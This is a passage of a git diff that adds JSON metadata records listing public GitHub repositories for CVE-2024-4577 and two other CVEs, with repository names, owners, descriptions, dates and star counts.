"https:\/\/github.com\/nemu1k5ma\/CVE-2024-4577", + "description": "php-cgi RCE快速检测", + "fork": false, + "created_at": "2024-06-12T02:16:09Z", + "updated_at": "2024-06-13T01:15:50Z", + "pushed_at": "2024-06-13T01:15:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813963749, + "name": "cve-2024-4577", + "full_name": "aaddmin1122345\/cve-2024-4577", + "owner": { + "login": "aaddmin1122345", + "id": 45313133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45313133?v=4", + "html_url": "https:\/\/github.com\/aaddmin1122345", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aaddmin1122345\/cve-2024-4577", + "description": "CVE-2024-4577", + "fork": false, + "created_at": "2024-06-12T04:50:25Z", + "updated_at": "2024-09-10T01:27:28Z", + "pushed_at": "2024-09-10T01:27:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814002252, + "name": "Shodan-CVE-2024-4577", + "full_name": "d3ck4\/Shodan-CVE-2024-4577", + "owner": { + "login": "d3ck4", + "id": 6336324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6336324?v=4", + "html_url": "https:\/\/github.com\/d3ck4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d3ck4\/Shodan-CVE-2024-4577", + "description": "POC for CVE-2024-4577 with Shodan integration", + "fork": false, + "created_at": "2024-06-12T06:45:08Z", + "updated_at": "2024-06-12T07:02:39Z", + "pushed_at": "2024-06-12T07:02:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814021668, + "name": "CVE-2024-4577_Analysis", + "full_name": "Entropt\/CVE-2024-4577_Analysis", + "owner": { + "login": "Entropt", + "id": 104687644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104687644?v=4", + "html_url": "https:\/\/github.com\/Entropt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Entropt\/CVE-2024-4577_Analysis", + "description": null, + "fork": false, + "created_at": "2024-06-12T07:33:41Z", + "updated_at": "2024-08-14T20:03:31Z", + "pushed_at": "2024-08-14T20:03:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814127553, + "name": "CVE-2024-4577-PHP-CGI-RCE", + "full_name": "XiangDongCJC\/CVE-2024-4577-PHP-CGI-RCE", + "owner": { + "login": "XiangDongCJC", + "id": 125707007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125707007?v=4", + "html_url": "https:\/\/github.com\/XiangDongCJC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiangDongCJC\/CVE-2024-4577-PHP-CGI-RCE", + "description": null, + "fork": false, + "created_at": "2024-06-12T11:50:01Z", + "updated_at": "2024-06-12T14:54:31Z", + "pushed_at": "2024-06-12T12:50:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814626066, + "name": "cve-2024-4577", + "full_name": "hexedbyte\/cve-2024-4577", + "owner": { + "login": "hexedbyte", + "id": 133281263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133281263?v=4", + "html_url": "https:\/\/github.com\/hexedbyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hexedbyte\/cve-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-06-13T11:28:33Z", + "updated_at": "2024-06-13T12:43:06Z", + "pushed_at": "2024-06-13T12:43:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814702003, + "name": "CVE-2024-4577", + "full_name": "Sh0ckFR\/CVE-2024-4577", + "owner": { + "login": "Sh0ckFR", + "id": 10033649, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10033649?v=4", + "html_url": "https:\/\/github.com\/Sh0ckFR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sh0ckFR\/CVE-2024-4577", + "description": "Fixed and minimalist PoC of the CVE-2024-4577", + "fork": false, + "created_at": "2024-06-13T14:25:04Z", + "updated_at": "2024-11-21T05:22:42Z", + "pushed_at": "2024-06-13T15:17:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815387127, + "name": "CVE-2024-4577", + "full_name": "gotr00t0day\/CVE-2024-4577", + "owner": { + "login": "gotr00t0day", + "id": 48636787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48636787?v=4", + "html_url": "https:\/\/github.com\/gotr00t0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gotr00t0day\/CVE-2024-4577", + "description": "Argument injection vulnerability in PHP", + "fork": false, + "created_at": "2024-06-15T02:49:37Z", + "updated_at": "2024-10-24T16:54:38Z", + "pushed_at": "2024-06-15T02:57:48Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815648681, + "name": "CVE-2024-4577", + "full_name": "sug4r-wr41th\/CVE-2024-4577", + "owner": { + "login": "sug4r-wr41th", + "id": 136193030, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136193030?v=4", + "html_url": "https:\/\/github.com\/sug4r-wr41th", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sug4r-wr41th\/CVE-2024-4577", + "description": "PHP CGI Remote Code Execution (CVE-2024-4577) PoC", + "fork": false, + "created_at": "2024-06-15T18:05:31Z", + "updated_at": "2024-11-22T07:38:45Z", + "pushed_at": "2024-06-15T18:12:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816417208, + "name": "CVE-2024-4577", + "full_name": "VictorShem\/CVE-2024-4577", + "owner": { + "login": "VictorShem", + "id": 106722243, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106722243?v=4", + "html_url": "https:\/\/github.com\/VictorShem", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VictorShem\/CVE-2024-4577", + "description": "CVE-2024-4577 POC", + "fork": false, + "created_at": "2024-06-17T17:53:31Z", + "updated_at": "2024-08-23T02:59:16Z", + "pushed_at": "2024-07-31T04:13:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816822296, + "name": "CVE-2024-4577-PHP-CGI-argument-injection-RCE", + "full_name": "jakabakos\/CVE-2024-4577-PHP-CGI-argument-injection-RCE", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-4577-PHP-CGI-argument-injection-RCE", + "description": null, + "fork": false, + "created_at": "2024-06-18T13:19:21Z", + "updated_at": "2024-07-11T08:35:27Z", + "pushed_at": "2024-06-18T13:54:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 819357672, + "name": "CVE-2024-4577-LetsDefend-walkthrough", + "full_name": "PhinehasNarh\/CVE-2024-4577-LetsDefend-walkthrough", + "owner": { + "login": "PhinehasNarh", + "id": 137224635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137224635?v=4", + "html_url": "https:\/\/github.com\/PhinehasNarh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PhinehasNarh\/CVE-2024-4577-LetsDefend-walkthrough", + "description": "This is an Incident Response Walkthrough: Mitigating a Zero-Day Attack (CVE-2024-4577)", + "fork": false, + "created_at": "2024-06-24T10:48:24Z", + "updated_at": "2024-11-19T23:50:04Z", + "pushed_at": "2024-06-24T11:00:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 820285162, + "name": "CVE-2024-4577", + "full_name": "ggfzx\/CVE-2024-4577", + "owner": { + "login": "ggfzx", + "id": 86279656, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86279656?v=4", + "html_url": "https:\/\/github.com\/ggfzx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ggfzx\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-06-26T07:07:49Z", + "updated_at": "2024-06-27T00:14:08Z", + "pushed_at": "2024-06-26T07:11:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821341176, + "name": "CVE-2024-4577", + "full_name": "olebris\/CVE-2024-4577", + "owner": { + "login": "olebris", + "id": 78493240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78493240?v=4", + "html_url": "https:\/\/github.com\/olebris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/olebris\/CVE-2024-4577", + "description": "CVE-2024-4577", + "fork": false, + "created_at": "2024-06-28T10:19:59Z", + "updated_at": "2024-06-28T10:20:21Z", + "pushed_at": "2024-06-28T10:20:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821427710, + "name": "CVE-2024-4577", + "full_name": "AlperenY-cs\/CVE-2024-4577", + "owner": { + "login": "AlperenY-cs", + "id": 45148606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45148606?v=4", + "html_url": "https:\/\/github.com\/AlperenY-cs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AlperenY-cs\/CVE-2024-4577", + "description": "Create lab for CVE-2024-4577", + "fork": false, + "created_at": "2024-06-28T14:11:15Z", + "updated_at": "2024-07-28T15:32:13Z", + "pushed_at": "2024-06-29T10:39:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823727293, + "name": "CVE-2024-4577", + "full_name": "charis3306\/CVE-2024-4577", + "owner": { + "login": "charis3306", + "id": 84823804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84823804?v=4", + "html_url": "https:\/\/github.com\/charis3306", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charis3306\/CVE-2024-4577", + "description": "CVE-2024-4577 EXP", + "fork": false, + "created_at": "2024-07-03T15:30:52Z", + "updated_at": "2024-07-03T15:41:46Z", + "pushed_at": "2024-07-03T15:41:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825104886, + "name": "CVE-2024-4577-RCE", + "full_name": "l0n3m4n\/CVE-2024-4577-RCE", + "owner": { + "login": "l0n3m4n", + "id": 143868630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143868630?v=4", + "html_url": "https:\/\/github.com\/l0n3m4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0n3m4n\/CVE-2024-4577-RCE", + "description": "PoC - PHP CGI Argument Injection CVE-2024-4577 (Scanner and Exploit)", + "fork": false, + "created_at": "2024-07-06T19:37:14Z", + "updated_at": "2024-12-27T08:50:35Z", + "pushed_at": "2024-07-07T15:32:58Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 827089430, + "name": "CVE-2024-4577-RCE-ATTACK", + "full_name": "bibo318\/CVE-2024-4577-RCE-ATTACK", + "owner": { + "login": "bibo318", + "id": 56821442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56821442?v=4", + "html_url": "https:\/\/github.com\/bibo318", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bibo318\/CVE-2024-4577-RCE-ATTACK", + "description": "ATTACK PoC - PHP CVE-2024-4577 ", + "fork": false, + "created_at": "2024-07-11T02:22:32Z", + "updated_at": "2024-09-30T17:27:58Z", + "pushed_at": "2024-07-11T08:37:00Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 829150278, + "name": "CVE-2024-4577-PHP-RCE", + "full_name": "waived\/CVE-2024-4577-PHP-RCE", + "owner": { + "login": "waived", + "id": 165493645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165493645?v=4", + "html_url": "https:\/\/github.com\/waived", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/waived\/CVE-2024-4577-PHP-RCE", + "description": "Automated PHP remote code execution scanner for CVE-2024-4577", + "fork": false, + "created_at": "2024-07-15T21:31:14Z", + "updated_at": "2024-11-20T16:30:56Z", + "pushed_at": "2024-09-06T02:10:35Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-4577", + "exploitation", + "php-rce", + "python3", + "remote-code-execution", + "vuln-scanner" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 830629911, + "name": "CVE-2024-4577", + "full_name": "nNoSuger\/CVE-2024-4577", + "owner": { + "login": "nNoSuger", + "id": 130155594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130155594?v=4", + "html_url": "https:\/\/github.com\/nNoSuger", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nNoSuger\/CVE-2024-4577", + "description": "CVE", + "fork": false, + "created_at": "2024-07-18T16:39:27Z", + "updated_at": "2024-07-18T16:39:27Z", + "pushed_at": "2024-07-18T16:39:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 833329743, + "name": "CVE-2024-4577", + "full_name": "a-roshbaik\/CVE-2024-4577", + "owner": { + "login": "a-roshbaik", + "id": 149660312, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149660312?v=4", + "html_url": "https:\/\/github.com\/a-roshbaik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/a-roshbaik\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-07-24T20:23:03Z", + "updated_at": "2024-07-24T20:23:03Z", + "pushed_at": "2024-07-24T20:23:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 833330595, + "name": "CVE-2024-4577-PHP-RCE", + "full_name": "a-roshbaik\/CVE-2024-4577-PHP-RCE", + "owner": { + "login": "a-roshbaik", + "id": 149660312, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149660312?v=4", + "html_url": "https:\/\/github.com\/a-roshbaik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/a-roshbaik\/CVE-2024-4577-PHP-RCE", + "description": null, + "fork": false, + "created_at": "2024-07-24T20:25:46Z", + "updated_at": "2024-07-24T20:29:28Z", + "pushed_at": "2024-07-24T20:29:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 836182474, + "name": "CVE-2024-4577", + "full_name": "Jcccccx\/CVE-2024-4577", + "owner": { + "login": "Jcccccx", + "id": 167961583, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167961583?v=4", + "html_url": "https:\/\/github.com\/Jcccccx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jcccccx\/CVE-2024-4577", + "description": "批量验证POC和EXP", + "fork": false, + "created_at": "2024-07-31T10:14:14Z", + "updated_at": "2024-07-31T10:37:59Z", + "pushed_at": "2024-07-31T10:37:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 843644753, + "name": "CVE-2024-4577", + "full_name": "bughuntar\/CVE-2024-4577", + "owner": { + "login": "bughuntar", + "id": 99727538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99727538?v=4", + "html_url": "https:\/\/github.com\/bughuntar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bughuntar\/CVE-2024-4577", + "description": "CVE-2024-4577 Exploits", + "fork": false, + "created_at": "2024-08-17T02:01:57Z", + "updated_at": "2024-08-17T02:02:29Z", + "pushed_at": "2024-08-17T02:02:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844815719, + "name": "CVE-2024-4577-RCE", + "full_name": "gh-ost00\/CVE-2024-4577-RCE", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-4577-RCE", + "description": "PHP CGI Argument Injection (CVE-2024-4577) RCE", + "fork": false, + "created_at": "2024-08-20T02:56:03Z", + "updated_at": "2024-12-17T20:19:30Z", + "pushed_at": "2024-08-20T03:28:28Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855328284, + "name": "PHP-CGI-RCE-Scanner", + "full_name": "ywChen-NTUST\/PHP-CGI-RCE-Scanner", + "owner": { + "login": "ywChen-NTUST", + "id": 26900397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26900397?v=4", + "html_url": "https:\/\/github.com\/ywChen-NTUST", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ywChen-NTUST\/PHP-CGI-RCE-Scanner", + "description": "Scanning CVE-2024-4577 vulnerability with a url list.", + "fork": false, + "created_at": "2024-09-10T17:31:07Z", + "updated_at": "2024-09-11T14:19:37Z", + "pushed_at": "2024-09-11T14:17:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-4577" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856550359, + "name": "Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-", + "full_name": "AhmedMansour93\/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-", + "owner": { + "login": "AhmedMansour93", + "id": 179945455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179945455?v=4", + "html_url": "https:\/\/github.com\/AhmedMansour93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AhmedMansour93\/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-", + "description": "🚨 New Incident Report Completed! 🚨 Just wrapped up \"Event ID 268: SOC292 - Possible PHP Injection Detected (CVE-2024-4577)\" on LetsDefend.io. This analysis involved investigating an attempted Command Injection targeting our PHP server. Staying ahead of these threats with continuous monitoring and swift containment! 🛡️ ", + "fork": false, + "created_at": "2024-09-12T19:10:38Z", + "updated_at": "2024-09-12T19:13:40Z", + "pushed_at": "2024-09-12T19:13:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856557928, + "name": "CVE-2024-4577", + "full_name": "phirojshah\/CVE-2024-4577", + "owner": { + "login": "phirojshah", + "id": 41940520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940520?v=4", + "html_url": "https:\/\/github.com\/phirojshah", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phirojshah\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-09-12T19:27:52Z", + "updated_at": "2024-09-16T17:57:37Z", + "pushed_at": "2024-09-12T19:28:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 867649513, + "name": "CVE-2024-4577-checker", + "full_name": "JeninSutradhar\/CVE-2024-4577-checker", + "owner": { + "login": "JeninSutradhar", + "id": 111521642, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111521642?v=4", + "html_url": "https:\/\/github.com\/JeninSutradhar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JeninSutradhar\/CVE-2024-4577-checker", + "description": "A Bash script designed to scan multiple domains for the CVE-2024-4577 vulnerability in PHP-CGI.", + "fork": false, + "created_at": "2024-10-04T13:10:19Z", + "updated_at": "2024-12-29T13:06:17Z", + "pushed_at": "2024-11-13T14:37:33Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve", + "cve-scanning", + "php8", + "security-scanner", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872339376, + "name": "CVE-2024-4577", + "full_name": "longhoangth18\/CVE-2024-4577", + "owner": { + "login": "longhoangth18", + "id": 152260528, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152260528?v=4", + "html_url": "https:\/\/github.com\/longhoangth18", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/longhoangth18\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-10-14T09:11:06Z", + "updated_at": "2024-11-04T07:44:41Z", + "pushed_at": "2024-10-14T09:36:45Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 882724102, + "name": "CVE-2024-4577", + "full_name": "ahmetramazank\/CVE-2024-4577", + "owner": { + "login": "ahmetramazank", + "id": 109250080, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109250080?v=4", + "html_url": "https:\/\/github.com\/ahmetramazank", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahmetramazank\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-11-03T15:42:04Z", + "updated_at": "2024-11-03T16:17:52Z", + "pushed_at": "2024-11-03T16:17:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884083771, + "name": "CVE-2024-4577-RCE-PoC", + "full_name": "BTtea\/CVE-2024-4577-RCE-PoC", + "owner": { + "login": "BTtea", + "id": 32271123, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32271123?v=4", + "html_url": "https:\/\/github.com\/BTtea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BTtea\/CVE-2024-4577-RCE-PoC", + "description": "CVE-2024-4577 RCE PoC", + "fork": false, + "created_at": "2024-11-06T05:30:33Z", + "updated_at": "2024-12-24T16:47:23Z", + "pushed_at": "2024-11-20T06:24:59Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46209.json b/2024/CVE-2024-46209.json new file mode 100644 index 0000000000..c057331940 --- /dev/null +++ b/2024/CVE-2024-46209.json @@ -0,0 +1,33 @@ +[ + { + "id": 847872001, + "name": "CVE-2024-46209", + "full_name": "h4ckr4v3n\/CVE-2024-46209", + "owner": { + "login": "h4ckr4v3n", + "id": 117841523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117841523?v=4", + "html_url": "https:\/\/github.com\/h4ckr4v3n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4ckr4v3n\/CVE-2024-46209", + "description": null, + "fork": false, + "created_at": "2024-08-26T17:52:27Z", + "updated_at": "2024-10-10T06:10:38Z", + "pushed_at": "2024-10-10T05:58:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46256.json b/2024/CVE-2024-46256.json new file mode 100644 index 0000000000..e27258aa2e --- /dev/null +++ b/2024/CVE-2024-46256.json @@ -0,0 +1,33 @@ +[ + { + "id": 859792463, + "name": "POC_CVE-2024-46256", + "full_name": "barttran2k\/POC_CVE-2024-46256", + "owner": { + "login": "barttran2k", + "id": 45133811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45133811?v=4", + "html_url": "https:\/\/github.com\/barttran2k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/barttran2k\/POC_CVE-2024-46256", + "description": "POC_CVE-2024-46256", + "fork": false, + "created_at": "2024-09-19T09:35:12Z", + "updated_at": "2024-10-23T00:37:03Z", + "pushed_at": "2024-09-19T09:47:59Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file 